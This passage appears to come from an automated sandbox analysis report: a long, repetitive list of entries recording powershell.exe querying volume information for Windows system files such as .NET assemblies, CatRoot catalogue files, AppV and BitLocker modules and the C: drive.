                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
